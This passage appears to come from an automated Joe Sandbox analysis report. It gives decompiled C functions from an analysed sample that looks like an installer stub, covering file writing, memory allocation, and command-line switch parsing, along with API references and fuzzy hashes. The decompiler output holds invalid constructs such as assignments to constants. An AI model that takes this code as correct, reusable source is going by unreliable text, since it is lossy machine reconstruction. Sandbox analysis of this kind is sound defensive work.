							if( *0x1088184 != 0) {
								_t21 =  *0x1088584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10893f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x01084ad5
0x01084adb
0x01084ae7
0x01084aee
0x01084b05
0x01084b0d
0x01084b14
0x01084b1a
0x01084b1c
0x01084b21
0x01084b2a
0x01084b2f
0x01084b31
0x01084b39
0x01084b54
0x01084b54
0x01084b39
0x01084b2f
0x01084b0f
0x01084b0f
0x01084b0f
0x01084b5e
0x01084ae9
0x01084aed
0x01084aed

APIs

Part of subcall function 01083680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0108369F
Part of subcall function 01083680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010836B2
Part of subcall function 01083680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010836DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 01084B05

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: 177e73880175cf72bf7c929076008e275e9f487c7e5ce603b24b3f0d514aa662
Instruction ID: c19bf35e73f537512f41836c27be49ce3e1a4895eb0f660fea45839d94831c91
Opcode Fuzzy Hash: 177e73880175cf72bf7c929076008e275e9f487c7e5ce603b24b3f0d514aa662
Instruction Fuzzy Hash: 8401C0312083029BDB64AF5CDC05BAA7B98F784729F048226FAF9DB1D4CB368811CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0108658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0108658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x1088b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x1088b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E010816B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x01086592
0x01086594
0x01086596
0x01086598
0x01086598
0x0108659b
0x0108659b
0x0108659d
0x0108659e
0x010865a2
0x010865a4
0x010865a9
0x010865b2
0x010865b6
0x010865ba
0x010865c3
0x010865c5
0x010865c8
0x010865c8
0x010865c3
0x010865c9
0x010865cc
0x010865d2
0x010865d1
0x010865d1
0x00000000
0x010865dc
0x00000000

APIs

CharPrevA.USER32(01088B3E,01088B3F,00000001,01088B3E,-00000003,?,010860EC,01081140,?), ref: 010865BA

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 766a413215bb6ff74692c198126c4a197b04d6b06ff33f53a730a2ec28a35269
Instruction ID: 2e39214dcda4c47ff6b39fe3c22cab7b5aee3d91b4fc25ead5c769fc0f2e19a4
Opcode Fuzzy Hash: 766a413215bb6ff74692c198126c4a197b04d6b06ff33f53a730a2ec28a35269
Instruction Fuzzy Hash: DAF0423210C250DFD331251D9884BAABFDE9B85160F1A01AEE9DAC3205CA674C4583B0

Uniqueness

Uniqueness Score: -1.00%

Function 0108621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0108621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0108597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E010844B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x1089124 = E01086285();
					_t9 = 0;
				}
				return E01086CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x01086229
0x01086230
0x01086247
0x0108626a
0x01086272
0x01086249
0x01086255
0x0108625f
0x01086264
0x01086264
0x01086284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0108623F

Part of subcall function 010844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01084518
Part of subcall function 010844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 01084554

Part of subcall function 01086285: GetLastError.KERNEL32(01085BBC), ref: 01086285

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: e953ef665eaa22a4f5c8ada7b3379dcda7a842111011902c955f3c973b863e54
Instruction ID: 7ea7534d96f3116013f18bb9b0525ccd31db2528bf7fc5460063ff8cba8797f0
Opcode Fuzzy Hash: e953ef665eaa22a4f5c8ada7b3379dcda7a842111011902c955f3c973b863e54
Instruction Fuzzy Hash: 56F0B47070C2096BD760FB748D01BFE36ACDB54300F4100AAA9C5DB081ED7699408750

Uniqueness

Uniqueness Score: -1.00%

Function 01084B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01084B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x1088d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x1088d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x1088d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x1088d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x1088d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x1088d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x1088d6c)) = 0;
				return 0;
			}

0x01084b66
0x01084b74
0x01084b98
0x01084ba0
0x00000000
0x01084bac
0x01084ba4
0x00000000
0x01084ba4
0x01084b78
0x01084b7e
0x01084b84
0x01084b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,01084FA1,00000000), ref: 01084B98

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: b0f1db66aaa8adc05ea31af73033efc9f2521a5e064387c6f032cb8aab8fae25
Instruction ID: 8445410055cd84f4e5115c6046e336f9676ada78cfe96dcabaf107623582c62f
Opcode Fuzzy Hash: b0f1db66aaa8adc05ea31af73033efc9f2521a5e064387c6f032cb8aab8fae25
Instruction Fuzzy Hash: 81F0123154CB1AAE8771FE69CC0069ABBE6AAA5260350892FB5EED2151F730E441CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 010866AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010866AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x010866b1
0x010866ba
0x010866c7
0x010866bc
0x010866be
0x010866be

APIs

GetFileAttributesA.KERNELBASE(?,01084777,?,01084E38,?), ref: 010866B1

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 69f6b42d010f1105066759c65c8aa0e486c88edd9195b56fa17b59d4916a8177
Instruction ID: 9d8979d2e80657adfc18b3bd87e581fface7ff7aac20586b69aaa16416b547e1
Opcode Fuzzy Hash: 69f6b42d010f1105066759c65c8aa0e486c88edd9195b56fa17b59d4916a8177
Instruction Fuzzy Hash: 8DB0927622A480826A611635682955A3881B6C123A7E51B91F0F2C15D4CA3FD456D504

Uniqueness

Uniqueness Score: -1.00%

Function 01084CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01084CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x01084caa
0x01084cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 01084CAA

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 010cca61247b60d72e55514dc8933c96b87d16b182b2eb4082624dc87e111646
Instruction ID: 3d2bd5c2040d805c456dd8a4b521afb923d669df041a019406eea28e34bcbca2
Opcode Fuzzy Hash: 010cca61247b60d72e55514dc8933c96b87d16b182b2eb4082624dc87e111646
Instruction Fuzzy Hash: 1DB0123214820CF7CF101EC2EC09F893F1DE7C4761F240011F64C464408A7B94118B95

Uniqueness

Uniqueness Score: -1.00%

Function 01084CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01084CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x01084cc8
0x01084ccf

APIs

GlobalFree.KERNEL32 ref: 01084CC8

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 08eba44dc508283ed054d09f4d64a8edda4d6e5600bbbfb1623b6855de54614f
Instruction ID: 491622f16f4069f32f242eaac5a4656680e6b7a7746f8889cfe0182f3bcc9a61
Opcode Fuzzy Hash: 08eba44dc508283ed054d09f4d64a8edda4d6e5600bbbfb1623b6855de54614f
Instruction Fuzzy Hash: 9EB0123100410CF78F101A42EC088493F1DD6C03607000021F54C465118B3B98128A84

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01085C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01085C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E01086CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E01086E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x1088004; // 0x4f5b7a6c
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0108597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E010844B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x1089124 = E01086285();
									_t75 = 0;
								}
								return E01086CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E010844B9(0, 0x521, 0x1081140, 0, 0x40, 0);
												_t85 =  *0x1088588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0108667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0108667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E01085C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E01081680(0x1088c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0108667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0108667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x1088a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E01085C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x1088b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x1088a3a;
																}
																E01081680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0108658A(_t218, 0x104, 0x1081140);
																if(E010831E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x1088a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x1088a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x1088a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x1088a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x1088a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x1089a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x1089a2c =  *0x1089a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x1088d48 =  *0x1088d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x1089a2c =  *0x1089a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x1089a2c =  *0x1089a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x1088d48 =  *0x1088d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x1089a2c =  *0x1089a2c | 0x00000004;
																										L70:
																										 *0x1088a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x1089a2c = 3;
																	 *0x1088a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x1088a2c != 0 &&  *0x1088b3e == 0) {
						if(GetModuleFileNameA( *0x1089a3c, 0x1088b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E010866C8(0x1088b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x01085c9e
0x01085ca9
0x01085cb0
0x01085cb3
0x01085cb6
0x01085cb7
0x01085cb8
0x01085cbd
0x01086204
0x01085ccb
0x00000000
0x01085ccb
0x01085cd3
0x01085cd7
0x01085cf4
0x00000000
0x01085cf4
0x01085cf8
0x01085d00
0x00000000
0x01085d06
0x01085d06
0x01085d0e
0x01085d10
0x01085d12
0x01085d14
0x01085d15
0x01085d17
0x01085d49
0x00000000
0x00000000
0x00000000
0x00000000
0x01085d19
0x01085d19
0x01085d1d
0x00000000
0x01085d3f
0x01085d3f
0x01085d4b
0x01085d4b
0x01085d4f
0x01085d8d
0x00000000
0x01085d93
0x01085d93
0x01085d9a
0x01085d9d
0x01085d9e
0x00000000
0x01085d9e
0x01085d51
0x01085d5b
0x01085d72
0x010860fb
0x010860fb
0x01086207
0x0108620a
0x0108620b
0x0108620e
0x01086217
0x01085d78
0x01085d78
0x01085d80
0x01085d83
0x01085d84
0x00000000
0x01085d84
0x01085d5d
0x01085d5f
0x01085d62
0x01085d68
0x01085d64
0x01085d64
0x01085d64
0x00000000
0x01085d62
0x01085d5b
0x01085d4f
0x01085d1d
0x00000000
0x01085d9f
0x01085d9f
0x01085da5
0x01085dab
0x01085dba
0x01086218
0x0108621d
0x01086220
0x01086221
0x01086229
0x01086230
0x01086247
0x0108626a
0x01086272
0x01086249
0x01086255
0x0108625f
0x01086264
0x01086264
0x01086284
0x01085dc0
0x01085dc0
0x01085dca
0x01085e22
0x00000000
0x00000000
0x00000000
0x00000000
0x01085dcc
0x01085dce
0x01085e24
0x01085e24
0x01085e2c
0x01085e47
0x01085e4a
0x010861d2
0x010861e2
0x010861e7
0x010861ee
0x010861f1
0x010861f1
0x010861f8
0x010861f8
0x01085e50
0x01085e53
0x01086109
0x0108611f
0x00000000
0x01086125
0x01086137
0x0108613a
0x0108613c
0x0108613e
0x0108613e
0x01086141
0x01086141
0x01086143
0x01086144
0x0108614a
0x00000000
0x01086150
0x01086152
0x0108615c
0x01086170
0x01086172
0x0108617c
0x01086190
0x01086190
0x01086196
0x010861a5
0x00000000
0x010861ab
0x010861b9
0x010861c6
0x010861c6
0x0108617e
0x01086180
0x0108618a
0x00000000
0x00000000
0x00000000
0x00000000
0x0108618a
0x0108615e
0x01086160
0x0108616a
0x00000000
0x00000000
0x00000000
0x00000000
0x0108616a
0x0108615c
0x0108614a
0x0108610b
0x0108610e
0x0108610e
0x00000000
0x01085e59
0x01085e59
0x01085e5c
0x0108604f
0x01086056
0x00000000
0x0108605c
0x0108606e
0x01086071
0x01086073
0x01086075
0x01086075
0x01086078
0x01086078
0x0108607a
0x0108607b
0x01086081
0x00000000
0x01086087
0x01086087
0x0108608d
0x0108609c
0x00000000
0x010860a2
0x010860aa
0x010860b2
0x010860b7
0x010860bd
0x010860bf
0x010860bf
0x010860d6
0x010860e0
0x010860e7
0x010860f5
0x00000000
0x00000000
0x00000000
0x00000000
0x010860f5
0x0108609c
0x01086081
0x01085e62
0x01085e62
0x01085e65
0x01085fd3
0x01085fe9
0x00000000
0x01085fef
0x01085fef
0x01085ff7
0x01085ffd
0x01086003
0x01086006
0x01086011
0x01086014
0x0108603d
0x01086016
0x01086018
0x01086019
0x0108601b
0x01086033
0x0108601d
0x01086020
0x01086029
0x01086022
0x01086022
0x01086022
0x01086020
0x0108601b
0x01086042
0x01086044
0x01086046
0x0108604a
0x01085ff7
0x01085fd5
0x01085fd8
0x01085fd8
0x00000000
0x01085e6b
0x01085e6b
0x01085e6e
0x01085f8b
0x01085f99
0x00000000
0x01085f9f
0x01085fa7
0x01085faf
0x00000000
0x01085fb1
0x01085fb3
0x00000000
0x01085fb5
0x01085fb7
0x00000000
0x01085fb9
0x00000000
0x01085fb9
0x01085fb7
0x01085fb3
0x01085faf
0x01085f8d
0x01085f8d
0x01085f8d
0x01085f8f
0x01085fc1
0x01085fc1
0x01085fc1
0x00000000
0x01085e74
0x01085e74
0x01085e77
0x01085ea0
0x01085ebd
0x01085f79
0x00000000
0x01085f7f
0x01085ec3
0x01085ec3
0x01085ecc
0x01085ed4
0x01085ed6
0x01085edc
0x01085edf
0x01085eea
0x01085eed
0x01085f3f
0x01085f40
0x00000000
0x01085eef
0x01085eef
0x01085ef2
0x01085f34
0x01085ef4
0x01085ef4
0x01085ef7
0x01085f2b
0x00000000
0x01085ef9
0x01085ef9
0x01085efc
0x01085f22
0x00000000
0x01085efe
0x01085eff
0x01085f02
0x01085f16
0x01085f04
0x01085f07
0x01085f0d
0x01085f46
0x01085f46
0x01085f09
0x01085f09
0x01085f09
0x01085f07
0x01085f02
0x01085efc
0x01085ef7
0x01085ef2
0x01085f4c
0x01085f4e
0x01085f50
0x01085f54
0x01085ed4
0x01085ea2
0x01085ea4
0x01085eaf
0x01085eaf
0x00000000
0x01085e79
0x01085e7d
0x00000000
0x01085e83
0x01085e83
0x01085e83
0x01085e85
0x01085e85
0x01085e8e
0x00000000
0x01085e94
0x00000000
0x01085e94
0x01085e8e
0x01085e7d
0x01085e77
0x01085e6e
0x01085e65
0x01085e5c
0x00000000
0x00000000
0x00000000
0x01085dd0
0x01085dd0
0x01085dd0
